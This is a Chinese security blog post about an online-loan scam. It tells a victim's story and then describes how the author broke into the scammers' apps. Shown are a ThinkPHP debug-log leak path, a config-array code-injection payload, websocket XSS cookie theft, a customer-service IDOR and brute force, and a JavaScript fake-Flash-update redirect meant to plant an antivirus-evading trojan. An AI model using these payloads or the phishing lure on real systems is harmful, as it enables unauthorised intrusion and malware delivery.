[实战] 针对网贷诈骗行业诈骗链分析

admin 2021年11月3日14:34:08[实战] 针对网贷诈骗行业诈骗链分析已关闭评论81 views字数 2701阅读9分0秒阅读模式

该文章首发先知社区:https://xz.aliyun.com/t/10391

一.概述

    1.1某天,一位网上朋友告诉笔者,他被骗了。被骗方式很独特,因为自己没钱所以选择贷款,在贷款过程中惨遭诈骗
    1.2诈骗短信:
[实战] 针对网贷诈骗行业诈骗链分析
    1.3诈骗过程(此处受害者用小辉代替):
    某日,小辉手机收到一条关于网络贷款的短信,恰逢月底,捉襟见肘,小辉没忍住诱惑下载打开了app。注册好账号,填写好身份证号、手持、工作地点、家人信息等后申请了20000元贷款,但是迟迟没到账,小辉询问客服得知:亲,这边申请贷款需要先缴纳688的VIP费用哦,缴纳后VIP费用会连同贷款金额一起打款到您的银行卡账户。小辉想了想,也不亏,于是将下个月房租开通了VIP待遇。
    小辉开通了VIP待遇,以为就能顺利贷款度过月底,但是还是没收到贷款金额以及VIP费用。这次客服主动联系小辉,"您的信用额度不够,需要再刷流水3500元,请缴纳现金证明还款能力,缴纳后费用会连同贷款金额一起打款到您的银行卡账户"。
    小辉急了,眼看着下个月房租没着落了,咬咬牙找朋友借了3500元再次打给客服提供的银行卡号,心想,这次你总没什么借口了吧!20000块钱,拿来吧你!小辉已经想好贷款下来两万块如何吃喝玩乐了,857857~~~
    可是幸运女神还是没有照顾小辉,客服再次联系小辉,称已经审批成功即将下款,但是还需要支付3000的工本费用,且费用会连同贷款金额一起打款到银行卡账户,小辉傻眼了,紧接着,客服将后台生成的虚假的合同发送给了小辉。
[实战] 针对网贷诈骗行业诈骗链分析
    小辉急了,自己就贷个款而已,却损失了几千块钱还要上征信,关键贷款的钱还没到手!小辉眼看着事情越闹越大,找到了我,经过小辉的一番描述,我查看了小辉手机上的贷款软件,无奈的告诉小辉,你被骗了,钱要不回来了。小辉此刻也愣住了,流下来悔恨的泪水......

ps:以上仅为诈骗真实过程,所有细节旁白均为本人添油加醋。笔者也就此对市面上两款常见诈骗源码进行简单分析并将其记录。

二.漏洞分析

2.1 第一套源码漏洞分析

2.1.1 Thinkphp日志泄漏

[实战] 针对网贷诈骗行业诈骗链分析
基于Thinkphp3.2.3开发,前后台分离
[实战] 针对网贷诈骗行业诈骗链分析
默认开启Debug、导致泄漏日志SQL信息、异常缓存
[实战] 针对网贷诈骗行业诈骗链分析
构造Payload:App/Runtime/Logs/21_10_16.log
[实战] 针对网贷诈骗行业诈骗链分析
获取泄漏的admin表账号密码
进入后台
[实战] 针对网贷诈骗行业诈骗链分析
avatar

2.1.2 数组可控导致RCE

可上传文件名被直接带入数据包中
[实战] 针对网贷诈骗行业诈骗链分析
此处猜测后端将文件名以数组的方式进行控制(在拿到webshell后也证明了这个猜想是正确的)
将可上传的文件名加入php,随后上传拿到Webshell
查看对应配置文件,发现可上传后缀名是在数组当中,此处还可以利用插入闭合数组进行Getshell
[实战] 针对网贷诈骗行业诈骗链分析
payload:siteName=11111').phpinfo();//
[实战] 针对网贷诈骗行业诈骗链分析
来看看后端如何处理的,因为return array的原因 必须加上字符串连接符"."
[实战] 针对网贷诈骗行业诈骗链分析
再登陆后台查看Payload是否执行
avatar

2.2 第二套源码漏洞分析

2.2.1 客服处Websocket-XSS

笔者能力有限,第二套诈骗贷款源码疑似一键搭建,均采用最新版宝塔+宝塔免费版WAF,在权限获取方面不足,转而向客服处寻找突破点
前台:
[实战] 针对网贷诈骗行业诈骗链分析
找到客服入口,上传图片,会转到通过websocket上传的数据包
修改websocket数据包,构造XSS
[实战] 针对网贷诈骗行业诈骗链分析
[实战] 针对网贷诈骗行业诈骗链分析
Cookie Get
avatar

三.客服系统控制/PC控制

3.1控制数据库

登陆mysql数据库查看诈骗嫌疑人登陆IP
[实战] 针对网贷诈骗行业诈骗链分析
杭州的电信基站动态IP,判断是家庭路由,暂无溯源价值。
avatar

3.2控制客服系统

第一套诈骗源码的客服系统使用的是网上在线客服系统
[实战] 针对网贷诈骗行业诈骗链分析
在后台翻到了客服的后台登陆地址,前端显示账号存在or密码错误,无奈账号没爆破成功。
[实战] 针对网贷诈骗行业诈骗链分析
随即笔者自己注册了该客服系统,通过adminid配合uid遍历SetCookie,越权成功,拿到客服账号。
[实战] 针对网贷诈骗行业诈骗链分析
中文账号==
[实战] 针对网贷诈骗行业诈骗链分析
爆破拿到密码
[实战] 针对网贷诈骗行业诈骗链分析
登陆客服后台
整个诈骗话术链
[实战] 针对网贷诈骗行业诈骗链分析
与受害人聊天记录
[实战] 针对网贷诈骗行业诈骗链分析
avatar

3.3使用flash钓鱼

在控制诈骗app服务器权限后,笔者使用flash钓鱼试图控制诈骗团伙个人PC。
在后台登陆成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面
事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)

<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.flashxxxx.com";</script>

效果:
输入账号密码后登录,此时加载以上JavaScript。
[实战] 针对网贷诈骗行业诈骗链分析
点击"确认"跳转到事先伪造的flash更新页面网站,诱导下载点击。
[实战] 针对网贷诈骗行业诈骗链分析
但是最后并未上线,通过日志发现诈骗团伙是登陆了该后台的,此处也算是一个小遗憾。

四.总结

    网贷诈骗类案件的典型特征是,犯罪嫌疑人以“无抵押无审核”为噱头招揽需要贷款的被害人,并以“账户冻结需做解冻”才能完成放款等名义收取保证金,又以保险费、激活费、服务费等名义再次收费。被害人为了收回之前缴纳的钱款,只能按照犯罪嫌疑人为被害人设计的整个流程,完成转款,导致被害人钱款被骗。一些急需用钱的个体经营者、消费观念超前的上班族、大学生等人群是易受骗群体。
    诈骗者不仅仅将罪恶之手伸向了香港、台湾,甚至是国外......
    据分析,这群诈骗团伙在巴西也进行了相同方式的诈骗,且使用的诈骗源码为以上分析第一套源码。
[实战] 针对网贷诈骗行业诈骗链分析
500余名巴西受害者。
[实战] 针对网贷诈骗行业诈骗链分析
avatar

    天网恢恢,疏而不漏!所有行恶之人必将受到法律之严惩!

相关推荐: 漏洞复现 | 图创图书馆集群管理系统存在任意文件读取漏洞 CNVD-2021-34454

前言CNVD-2021-34454由团队师傅小小小月球挖掘申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!漏洞背景广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月3日14:34:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [实战] 针对网贷诈骗行业诈骗链分析http://cn-sec.com/archives/610132.html